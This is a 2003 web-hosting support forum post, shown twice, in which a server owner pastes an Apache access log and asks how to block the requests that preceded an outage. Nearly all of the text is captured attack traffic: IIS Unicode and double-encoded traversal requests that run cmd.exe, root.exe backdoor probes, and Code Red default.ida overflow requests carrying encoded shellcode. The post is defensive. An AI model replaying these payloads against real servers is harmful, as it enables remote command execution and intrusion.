Hi,
How to stop/block these below process;
"12.224.137.0 - - [15/Jun/2003:04:33:48 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:48 -0400] "GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 -
12.224.137.0 - - [15/Jun/2003:04:33:48 -0400] "GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 -
12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/root.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:51 -0400] "GET /scripts/shell.exe?/c+dir+c: HTTP/1.1" 404 -
127.0.0.1 - - [15/Jun/2003:04:35:01 -0400] "GET /whm-server-status HTTP/1.0" 200 17184
127.0.0.1 - - [15/Jun/2003:04:37:30 -0400] "GET / HTTP/1.0" 200 2673
66.168.234.28 - - [15/Jun/2003:04:39:34 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
127.0.0.1 - - [15/Jun/2003:04:40:01 -0400] "GET /whm-server-status HTTP/1.0" 200 17559
218.70.224.215 - - [15/Jun/2003:04:40:22 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
217.219.246.4 - - [15/Jun/2003:04:44:22 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
66.190.164.146 - - [15/Jun/2003:04:44:56 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:44:57 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:44:58 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:44:59 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:45:00 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:45:01 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
127.0.0.1 - - [15/Jun/2003:04:45:01 -0400] "GET /whm-server-status HTTP/1.0" 200 17966
66.190.164.146 - - [15/Jun/2003:04:45:01 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:45:02 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:45:03 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:45:04 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
66.190.164.146 - - [15/Jun/2003:04:45:05 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:45:06 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:45:06 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
66.190.164.146 - - [15/Jun/2003:04:45:07 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
66.190.164.146 - - [15/Jun/2003:04:45:08 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:45:09 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
127.0.0.1 - - [15/Jun/2003:04:45:50 -0400] "GET / HTTP/1.0" 200 2673
127.0.0.1 - - [15/Jun/2003:04:50:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18253
66.82.121.147 - - [15/Jun/2003:04:51:49 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
127.0.0.1 - - [15/Jun/2003:04:54:11 -0400] "GET / HTTP/1.0" 200 2673
127.0.0.1 - - [15/Jun/2003:04:55:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18059
66.227.42.208 - - [15/Jun/2003:04:57:40 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
66.31.55.164 - - [15/Jun/2003:04:57:40 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:41 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:43 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:44 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:44 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
66.31.55.164 - - [15/Jun/2003:04:57:45 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:45 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:45 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
66.31.55.164 - - [15/Jun/2003:04:57:46 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
66.31.55.164 - - [15/Jun/2003:04:57:46 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:47 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.126.168.169 - - [15/Jun/2003:04:57:48 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
24.130.75.129 - - [15/Jun/2003:04:58:28 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
127.0.0.1 - - [15/Jun/2003:05:00:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18040
127.0.0.1 - - [15/Jun/2003:05:02:31 -0400] "GET / HTTP/1.0" 200 2673
127.0.0.1 - - [15/Jun/2003:05:05:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18264
12.224.137.0 - - [15/Jun/2003:05:08:53 -0400] "GET /..%255c..%280
12.224.137.0 - - [15/Jun/2003:05:08:59 -0400] "GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 -
12.224.137.0 - - [15/Jun/2003:05:08:59 -0400] "GET /msadc/
....................."
Becouse, after these process, my server down.
Thanks for your help
cPanel.net Support Ticket Number:
How to stop/block these below process;
"12.224.137.0 - - [15/Jun/2003:04:33:48 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:48 -0400] "GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 -
12.224.137.0 - - [15/Jun/2003:04:33:48 -0400] "GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 -
12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/root.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:51 -0400] "GET /scripts/shell.exe?/c+dir+c: HTTP/1.1" 404 -
127.0.0.1 - - [15/Jun/2003:04:35:01 -0400] "GET /whm-server-status HTTP/1.0" 200 17184
127.0.0.1 - - [15/Jun/2003:04:37:30 -0400] "GET / HTTP/1.0" 200 2673
66.168.234.28 - - [15/Jun/2003:04:39:34 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
127.0.0.1 - - [15/Jun/2003:04:40:01 -0400] "GET /whm-server-status HTTP/1.0" 200 17559
218.70.224.215 - - [15/Jun/2003:04:40:22 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
217.219.246.4 - - [15/Jun/2003:04:44:22 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
66.190.164.146 - - [15/Jun/2003:04:44:56 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:44:57 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:44:58 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:44:59 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:45:00 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:45:01 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
127.0.0.1 - - [15/Jun/2003:04:45:01 -0400] "GET /whm-server-status HTTP/1.0" 200 17966
66.190.164.146 - - [15/Jun/2003:04:45:01 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:45:02 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:45:03 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:45:04 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
66.190.164.146 - - [15/Jun/2003:04:45:05 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:45:06 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:45:06 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
66.190.164.146 - - [15/Jun/2003:04:45:07 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
66.190.164.146 - - [15/Jun/2003:04:45:08 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:45:09 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
127.0.0.1 - - [15/Jun/2003:04:45:50 -0400] "GET / HTTP/1.0" 200 2673
127.0.0.1 - - [15/Jun/2003:04:50:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18253
66.82.121.147 - - [15/Jun/2003:04:51:49 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
127.0.0.1 - - [15/Jun/2003:04:54:11 -0400] "GET / HTTP/1.0" 200 2673
127.0.0.1 - - [15/Jun/2003:04:55:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18059
66.227.42.208 - - [15/Jun/2003:04:57:40 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
66.31.55.164 - - [15/Jun/2003:04:57:40 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:41 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:43 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:44 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:44 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
66.31.55.164 - - [15/Jun/2003:04:57:45 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:45 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:45 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
66.31.55.164 - - [15/Jun/2003:04:57:46 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
66.31.55.164 - - [15/Jun/2003:04:57:46 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:47 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.126.168.169 - - [15/Jun/2003:04:57:48 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
24.130.75.129 - - [15/Jun/2003:04:58:28 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
127.0.0.1 - - [15/Jun/2003:05:00:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18040
127.0.0.1 - - [15/Jun/2003:05:02:31 -0400] "GET / HTTP/1.0" 200 2673
127.0.0.1 - - [15/Jun/2003:05:05:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18264
12.224.137.0 - - [15/Jun/2003:05:08:53 -0400] "GET /..%255c..%280
12.224.137.0 - - [15/Jun/2003:05:08:59 -0400] "GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 -
12.224.137.0 - - [15/Jun/2003:05:08:59 -0400] "GET /msadc/
....................."
Becouse, after these process, my server down.
Thanks for your help
cPanel.net Support Ticket Number: